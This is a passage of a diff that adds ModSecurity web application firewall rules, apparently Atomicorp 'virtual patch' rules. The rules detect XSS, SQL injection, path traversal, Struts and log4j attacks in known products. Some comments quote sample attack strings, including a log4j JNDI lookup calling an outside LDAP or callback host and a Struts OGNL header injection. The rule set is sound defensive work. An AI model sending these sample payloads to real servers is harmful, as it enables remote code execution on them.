+SecRule REQUEST_URI|REQUEST_BODY "echo _ghc/rst_" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390445,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known PHP Wormsign'"
+
+
+# Rule 310019: YaPiG Multiple Vulnerabilities
+SecRule ARGS:Website "<[[:space:]]*(?:script|about|applet|activex|chrome)" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390444,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: YaPiG PHP XSS vulnerability'"
+
+
+# Rule 310019: YaPiG Multiple Vulnerabilities
+#SecRule ARGS:title "< ?php.*php ?>" #"id:390443,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: YaPiG PHP code injection vulnerability'"
+
+
+# Rule 310019: IBM Lotus Domino XSS attempts
+#SecRule REQUEST_URI "(?:openform.*/basetarget=.*\"|openframeset.*/src=.*\">< ?/ ?frameset ?>.*< ?script ?>.*< ?/ ?script ?>)" #"id:390442,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: IBM Lotus Domino XSS attempts'"
+
+
+# Rule 310019: HP OpenView network Node Manager Remote Command Execution Attempt
+SecRule REQUEST_URI "/ovcgi/connectednodes\.ovpl\?"  "t:none,t:urlDecodeUni,t:lowercase,chain,id:390441,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: HP OpenView network Node Manager Remote Command Execution Attempt'"
+SecRule ARGS:node "\|"
+
+
+
+# Rule 310019: RSA ACE/agent for Web "image" Cross-Site Scripting Vulnerability
+SecRule REQUEST_URI "/webauthentication\?getpic" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390440,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RSA ACE/agent for Web image Cross-Site Scripting Vulnerability'"
+SecRule REQUEST_URI "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019:  PHP config recon attack
+SecRule REQUEST_URI "/php\.ini$" "t:none,t:urlDecodeUni,t:lowercase,id:390439,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP config recon attack'"
+
+
+# Rule 310019:   SaveWebPortal menu_dx.php and menu_sx.php Multiple Variable XSS
+SecRule REQUEST_URI "/menu_dx\.ph" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390438,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SaveWebPortal menu_dx.php and menu_sx.php Multiple Variable XSS'"
+SecRule ARGS:L_InsertCorrectly|ARGS:L_MENUDX_login|ARGS:L_MENUDX_username|ARGS:L_MENUDX_Password|ARGS:L_Ok|ARGS:IMAGES_Url|ARGS:L_MENUDX_Registration|ARGS:BANNER_Url|ARGS:L_MENUSX_Newsletter|ARGS:L_MENUDX_InsertEMail "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019: eyeOS Script Insertion and Exposure of user Credentials
+SecRule REQUEST_URI "/usrinfo\.xml" "t:none,t:urlDecodeUni,t:lowercase,id:390437,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eyeOS Script Insertion and Exposure of user Credentials'"
+
+
+# Rule 310019: cutenews shell injection vuln
+SecRule REQUEST_URI "/inc/ipban\.mdu"         "t:none,t:urlDecodeUni,t:lowercase,chain,id:319003,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cutenews shell injection vuln'"
+SecRule ARGS:add_ip "(?:php|system)"
+
+
+# Rule 310019: sumthin scan
+SecRule REQUEST_URI  "/sumthin(:?/|$)"         "t:none,t:urlDecodeUni,t:lowercase,id:319000,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Attack Tool probe'"
+
+
+# Rule 310019: EkinBoard 1.0.3 config.php SQL Injection through cookie
+SecRule REQUEST_COOKIES:username "or isnull\("         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:319001,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EkinBoard 1.0.3 config.php SQL Injection through cookie'"
+
+# Rule 310019: EkinBoard 1.0.3 config.php SQL Injection through cookie
+#SecRule REQUEST_URI  "&activate=1&allow_attch=1&attch_exts=.*php&.*attch_max_size=" #        "id:319002,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EkinBoard 1.0.3 config.php SQL Injection'"
+
+
+# Rule 310019: Ezyhelpdesk Multiple SQL Injection Vulnerabilities
+#SecRule REQUEST_URI  "/\?mid=.*&m2id=.*page=.*(?:faq_id|c_id).*(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)" #"t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390436,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Ezyhelpdesk Multiple SQL Injection Vulnerabilities'"
+
+
+# Rule 310019: Ezyhelpdesk Multiple SQL Injection Vulnerabilities
+#SecRule REQUEST_URI  "/\?edit=spec_view&edit_id.*(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)"  #"t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390435,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Ezyhelpdesk Multiple SQL Injection Vulnerabilities'"
+
+
+# Rule 310019: PmWiki 2.0.12 Cross Site Scripting
+SecRule REQUEST_URI  "/search " "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390434,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PmWiki 2.0.12 Cross Site Scripting'"
+SecRule ARGS:action "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019: CommodityRentals "user_id" SQL Injection Vulnerability
+SecRule REQUEST_URI  "/usersession" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390433,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CommodityRentals user_id SQL Injection Vulnerability'"
+SecRule ARGS:userid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)"
+
+
+# Rule 310019: Joomla! mod_poll SQL Injection
+SecRule REQUEST_URI  "/mod_poll" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390432,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla! mod_poll SQL Injection'"
+SecRule ARGS:itemid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: vTiger code inclusion attack
+SecRule REQUEST_URI  "/vtigercrm\.log" "t:none,t:urlDecodeUni,t:lowercase,id:390431,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vTiger code inclusion attack'"
+
+
+# Rule 310019: AgileBill "id" SQL Injection Vulnerability
+SecRule REQUEST_URI  "/\?_page=product_cat\:t_"  "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390430,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AgileBill id SQL Injection Vulnerability'"
+SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*into.*from)"
+
+
+# Rule 310019: Fake gif file shell attacvk
+#SecRule REQUEST_BODY "chr\(" #"id:310020,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP shell attack'"
+
+
+# Rule 310019: interesting new pattern
+SecRule REQUEST_URI  "/thisfilemustnotexist"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390667,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Non Existent File Hack Probe'"
+
+
+# Rule 310019:  SocketKB 1.1.x file include Vuln
+SecRule REQUEST_URI "\?__f=(?:rating_add|category)&"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390668,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SocketKB 1.1.x file include Vulnerability'"
+
+
+# Rule 310019:  SocketKB 1.1.x file include Vuln
+SecRule ARGS:art_id|ARGS:node "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390669,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SocketKB 1.1.x file include Vulnerability '"
+
+
+# Rule 310019: Saxon XSLT command execution attacks
+SecRule REQUEST_URI|ARGS "xsl(?:\:value-of select=\"run\:exec\(|run\:getruntime\(\)\, \'\")"         "id:393657,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Saxon XSLT command execution attacks'"
+
+
+# Rule 310019: PhpX <= 3.5.9 SQL Injection -> login bypass -> remote command/code execution
+SecRule REQUEST_URI "/admin/"          "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:393658,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Saxon XSLT command execution attacks'"
+SecRule ARGS:username "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union.*select.*from|or user_id=2)"
+
+
+# Rule 310019: Orca Blog SQL inj. vuln.
+SecRule REQUEST_URI "/blog\?msg=(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"          "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:393659,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Orca Blog SQL injection Vulnerability'"
+
+
+# Rule 310019:  phpMyAdmin Cross-Site Scripting Vulnerabilities
+SecRule REQUEST_HEADERS:Host "(?:<[[:space:]]*(script|img src|about|applet|activex|chrome)|onmouseover=|javascript\:)"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390662,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cross-Site Scripting Attempt in Host header'"
+
+
+# Rule 310019: Nortel SSL VPN Web Interface  XSS
+SecRule REQUEST_URI "/tunnelform\.yaws"         "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390663,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nortel SSL VPN Web Interface  XSS'"
+SecRule ARGS:a "(<[[:space:]]*(script|about|applet|activex|chrome)|onmouseover=\'javascript)"
+
+
+# Rule 310019:  SyntaxCMS XSS vuln.
+SecRule REQUEST_URI "/search/\?search_query=*(<[[:space:]]*(script|about|applet|activex|chrome)|onmouseover=\'javascript)"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390664,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SyntaxCMS XSS vulnerability'"
+
+
+# Rule 310019: SiteSage "norelay_highlight_words" Cross-Site Scripting Vulnerability
+SecRule ARGS:norelay_highlight_words "(<[[:space:]]*(script|about|applet|activex|chrome)|onmouseover=\'javascript)"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390665,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SiteSage norelay_highlight_words Cross-Site Scripting Vulnerability'"
+
+
+# Rule 310019: Portfolio netPublish "template" Disclosure of Sensitive information
+SecRule REQUEST_URI "/server\.np"         "chain,id:390666,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SiteSage norelay_highlight_words Cross-Site Scripting Vulnerability'"
+SecRule ARGS:template "\.\./"
+
+
+# Rule 310019: phpBB <= 2.0.17 remote command execution exploit
+#SecRule REQUEST_URI|ARGS "(?:r57phpbb2017xpl|_bill_gates@microsoft\.com)" #        "id:393667,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB <= 2.0.17 remote command execution exploit'"
+
+
+# Rule 310019: TFT Gallery "passwd" Exposure of user Credentials
+SecRule REQUEST_URI "admin/passwd$" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390035,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TFT Gallery passwd Exposure of user Credentials'"
+
+
+# Rule 310019: WEBalbum Local File Inclusion Vulnerability
+SecRule REQUEST_COOKIES:skin2 "\.\." "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390037,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WEBalbum Local File Inclusion Vulnerability'"
+
+
+# Rule 310019: Horde Help Module Remote Execution
+SecRule REQUEST_URI "/services/help/\?" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390040,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde Help Module Remote Execution'"
+SecRule ARGS:module ";"
+
+
+# Rule 310019: ManageEngine OpManager "searchTerm" Cross-Site Scripting
+SecRule  REQUEST_URI "search\.do" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390048,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ManageEngine OpManager searchTerm Cross-Site Scripting'"
+SecRule ARGS:searchTerm "(?:script|about|applet|activex)"
+
+
+# Rule 310019: Horde passthru protection
+#SecRule REQUEST_URI "/services/help(/)?\?(.*)?\&module=.*passthru\(.*\)" "id:390066,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde passthru exploit'"
+SecRule REQUEST_URI "/services/help" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390066,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde passthru exploit'"
+SecRule ARGS:module "\("
+
+
+# Rule 310019: test for valid X-forearded header
+#SecRule REQUEST_HEADERS:X_FORWARDED_FOR "!^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|)|unknown),?(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|)|unknown)?" "id:390080,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Test: Checking for valid X-Forwarded header',log,pass"
+
+
+# Rule 310019: TikiWiki jhot.php upload exploit
+SecRule REQUEST_URI  "img/wiki/"  "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390099,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki non-image upload exploit'"
+SecRule REQUEST_URI  "\.!(jpe?g|gif|png|bmp)"
+
+
+# Rule 310019: TWiki "filename" Parameter Disclosure of Sensitive information
+SecRule REQUEST_URI "/twiki/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390110,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TWiki filename Parameter Disclosure of Sensitive information'"
+SecRule ARGS:filename "\.\./\.\."
+
+
+# Rule 310019: Servlet auth attack
+SecRule REQUEST_URI "/servlet/admin\?category=server\&method=listall\&authorization" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Servlet Auth exposure Vulnerability'"
+
+
+# Rule 310019: Eazy Cart Multiple Vulnerabilities
+SecRule REQUEST_URI "admin/config/customer\.dat" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390155,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Eazy Cart Customer Data Access'"
+
+#e-Classifieds Corporate Edition "db" Cross-Site Scripting
+SecRule REQUEST_URI "/hsx/classifieds\.hsx" 	"t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390168, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: e-Classifieds Corporate Edition db Cross-Site Scripting'"
+SecRule ARGS:db "script"
+
+#Aztech ADSL2/2+ 4 Port remote root
+SecRule REQUEST_URI "cgi-bin/script\?system &"        "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:390172, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Aztech ADSL2/2 remote root '"
+
+#Joomla token exploit
+SecRule ARGS:option "com_user"   "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,chain,id:393204,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla token exploit'"
+SecRule ARGS:task "confirmreset" chain
+SecRule ARGS:token "!([a-z0-9-]{32})"
+
+#Joomla search SQL injection
+SecRule ARGS:catid "jos_users" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:390600,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla catid ARG SQL injection'"
+
+#JAMWiki "message" Cross-Site Scripting Vulnerability
+#Special:Login?message=XSS
+SecRule REQUEST_URI "special\:login" "deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,id:393652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JAMWiki message Cross-Site Scripting Vulnerability'"
+SecRule ARGS:message "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\" ?> ?<|\" ?[a-z]+ ?<|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"
+
+#Floating point DOS JITP
+SecRule ARGS|REQUEST_HEADERS "@contains 2.2250738585072012e-308" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,id:370651,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Floating Point DoS Attack'"
+
+#RoR POC exploit
+SecRule REQUEST_HEADERS:Content-Type "@contains text/xml" "deny,log,auditlog,status:403,chain,id:376419,rev:1,phase:2,t:none,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Ruby on Rails XML Exploit Attempt',logdata:'%{matched_var}',tag:'CVE-2013-0156'"
+SecRule XML:/* "\!ruby/" "t:none,t:lowercase"
+
+#Apache struts
+#index.action
+#/struts2-rest-showcase/orders.xhtml
+SecRule REQUEST_URI "/struts2-rest-showcase/orders\.xhtml" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:370662,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Apache Struts Probe'"
+
+SecRule REQUEST_URI "/index\.action.{1,100}com\.opensymphony\.xwork2\.dispatcher\.HttpServletRequest" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:370652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Apache Struts Probe'"
+
+
+#a2billing/customer/templates/default/header.tpl
+SecRule REQUEST_URI "a2billing/customer/templates/default/header.tpl" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:372356,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: a2billing Probe'"
+
+#/s/cfx/_/;
+SecRule REQUEST_URI  "/s/cfx/_/;"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:345113,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JIRA CVE-2021-26086 attack blocked'"
+SecMarker END_JITP
+
+
+#released from ebargoed rules 12/10
+#REQUEST_HEADERS
+#"${jndi:ldap://1.2.3.4:12344/Basic/Command/Base64/somehash=}"
+#SecRule REQUEST_HEADERS "\{jndi\:ldap\:/" 
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS "(?:(?:\{jndi|\{ctx)\:[a-z]+\:/|\:(?:dns|ldaps?|iiop|rmi)\$\{)"         "phase:1,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:removecomments,t:removeWhiteSpace,t:lowercase,id:345115,rev:7,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: log4j CVE-2021-44228 attack blocked'"
+
+#${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
+SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:Cookie "\{.{,50}j.{,50}n.{,50}d.{,50}i.{,50}\:.{,50}/.{,50}[a-z]"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:removeComments,t:removeWhiteSpace,t:cmdline,multimatch,id:345114,rev:9,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: log4j CVE-2021-44228 obfuscated attack blocked'"
+
+#${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/* "[$]{[\w\${}\-:]*j[\w\${}\-:]*n[\w\${}\-:]*d[\w\${}\-:]*i[\w\${}\-:]*:.*}"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:removeComments,t:removeWhiteSpace,t:cmdline,multimatch,id:345117,rev:5,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: log4j CVE-2021-44228 broad scope obfuscated attack blocked'"
+
+#/${${
+SecRule REQUEST_URI "(?:/\$\{\$\{|env:(?:env_name|user)|\$\{jndi)" "phase:1,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:removeComments,t:removeWhiteSpace,id:345118,rev:5,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: log4j CVE-2021-44228 broad scope obfuscated attack blocked'"
+
+
+
+#SecRule REQUEST_HEADERS "\${(\${(.*?:|.*?:.*?:-)(\'|\"|\`)*(?1)}*|[jndi:(ldaps?|rm|dns)](\'|\"|\`)*}*){9,10}" #        "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,id:345116,rev:3,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: log4j CVE-2021-44228 attack blocked'"
+
+#Released from encrypted rules 3/4/20
+SecRule &ARGS:do_reset_wordpress "@eq 1"  "deny,log,auditlog,status:403,t:none,id:375357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Themegrill site reset attempt blocked'"
+
+#';$r=$_REQUEST
+SecRule REQUEST_URI "\';\$r=\$_request" "phase:2,deny,id:332751,rev:2,severity:1,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: b2evolution CMS 6.6.0 - 6.8.10 PHP code execution attack blocked'"
+
+#Added for systems that disable the content type protection rules
+SecRule REQUEST_HEADERS:Content-Type "(?:\%\{\(|cmds?=\')" "phase:2,deny,id:332791,rev:2,severity:1,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: Apache Struts RCE Attack'"
+
+#sanity check content-type header
+#example attack
+#Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('xqmuvam','xqmuvam')}.multipart/form-data
+SecRule REQUEST_HEADERS:Content-Type "!@rx ^[a-z0-9/\+\.\;\-\, \=\"\%_\*]+$"  "phase:2,t:none,t:urlDecodeUni,t:lowercase,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Request content type header contains invalid characters',id:'334168',rev:8,severity:'2',capture,logdata:'%{TX.0}'"
+
+#Vulnerability scanner
+SecRule ARGS "wf_xsrf\.html" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,id:390692,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Vulnerability scanner attempting XSRF probe'"
+
+#Mcafee: ResponseSplitting
+SecRule REQUEST_BODY "mcafee: responseplitting" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390690,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Vulnerability scanner attempting response splitting'"
+
+#Vulnerability scanner
+SecRule ARGS "quotetest ?(?:\"|\'|\`)1(?:\"|\'|\`)1(?:\"|\'|\`)" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390691,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Vulnerability scanner attempting SQL unescape probe'"
+
+SecRule REQUEST_URI "/uploads/backupbuddy_backups/"         "id:311009,rev:3,chain,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skipAfter:BACKUP_BUDDY"
+SecRule REQUEST_HEADERS:REFERER "/wp-admin/admin\.php\?page=(?:pluginbuddy_backupbuddy-backup|pb_backupbuddy)"
+
+SecRule REQUEST_URI "/uploads/backupbuddy_backups/" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:397679,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Unauthorized attempt to access insecure BackupBuddy backup.'"
+
+SecMarker BACKUP_BUDDY
+
+#Detect Backupbuddy download, but dont block
+SecRule REQUEST_URI "/uploads/backupbuddy_backups/" "pass,status:403,t:none,t:urlDecodeUni,t:lowercase,id:397678,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Access to unauthenticated BackupBuddy backup file.  Not blocked.',log,auditlog"
+
+#gitorious
+SecRule REQUEST_URI "/repo/log/graph/`" "t:none,t:urlDecodeUni,t:lowercase,id:397680,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Attempt to exploit command injection vulnerability in Gitorious.'"
+
+#grapfile upload
+#images, avis, mp3s, zips
+SecRule REQUEST_URI "/wp-content/plugins/grapefile/filestore/avi/"  "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:381236,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Access to non media file uploaded via grapfile WP plugin denied',logdata:'%{TX.0}'"
+SecRule REQUEST_URI "!(avi|jpe?g|png|mp3|zip|rar|gif)$"
+
+#Worm
+#/HNAP1/
+SecRule REQUEST_URI "/HNAP1/"  "log,deny,log,auditlog,t:none,capture,id:381237,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DLINK worm probe',logdata:'%{TX.0}'"
+
+#Worm
+#/info/whitelist.pac
